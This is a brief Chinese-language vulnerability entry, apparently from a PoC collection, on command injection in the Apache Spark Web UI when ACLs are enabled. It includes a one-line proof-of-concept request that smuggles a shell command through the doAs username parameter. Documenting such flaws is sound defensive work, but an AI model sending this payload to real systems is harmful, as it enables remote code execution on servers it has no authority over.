Apache Spark 支持启动 ACL 来为 Web UI 访问提供身份验证,当 ACL 启动时可以通过构造特殊请求用户名导致 RCE
主页面
验证POC
/jobs/?doAs=`touch /tmp/test.txt`
Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631 Apache Struts2 S2-062 远程代码执行漏洞 CVE-2021-31805